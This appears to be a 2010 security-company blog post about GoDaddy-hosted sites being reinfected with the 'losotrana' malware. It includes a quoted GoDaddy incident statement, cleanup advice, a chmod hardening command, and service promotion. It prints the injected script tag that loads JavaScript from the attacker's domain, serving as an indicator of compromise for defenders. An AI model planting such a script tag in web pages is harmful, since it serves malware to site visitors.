Update from GoDaddy: Less than 200 accounts hacked this morning as they were able to contain it before it spread. On their own words:
Compromised Website Update 5/20/10 – An attack impacting less than 200 accounts happened this morning.
Go Daddy is working with other top hosting providers and security experts to gather information to stop to the criminals initiating these exploits.
We have contacted the malware site registrar to remove the offending domain from the Internet, in order to block the attack.
As part of our investigation, Go Daddy has launched a fact-finding tool to collect information about your experience. If you suspect your site was impacted, please fill out our security submission form, located here – http://www.godaddy.com/securityissue.
Thank you, Todd Redfoot, Chief Information Security Officer
Original post: Yes, this is serious. GoDaddy has not fixed their problems yet. Just a few hours ago, we started to notice A LOT of sites reinfected with the “losotrana” malware.
< script src=”http://losotrana.com/js.php”></script>
It seems to be happening as of now, since our scanner just started to alert our customers.
Is your site exploited? Our script will fix it again: Simple Cleanup Solution
Details? Everything is the same as: Attacks Continue on GoDaddy
Are you a GoDaddy customer? Call them and demand a fix, seriously!
If you still need help, please contact us: firstname.lastname@example.org.
BIG Bonus: We noticed that on the sites where we set all the permissions to read-only were not affected. Their script do not check the permissions, so if you “chmod 444″ on all your PHP files you will be safe against this attack (444 = read-only permissions for everyone).
A simple script to do that would be: find ./ -name “*.php” -type f| xargs chmod 444
BIG Bonus #2: GoDaddy’s FTP server are down for a few hosts. Very helpful for people trying to fix their sites.
As always, if you are having difficulties getting your site cleanup, send us an email at email@example.com or visit our site: Sucuri.net. We can get your sites clean up right away.
Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.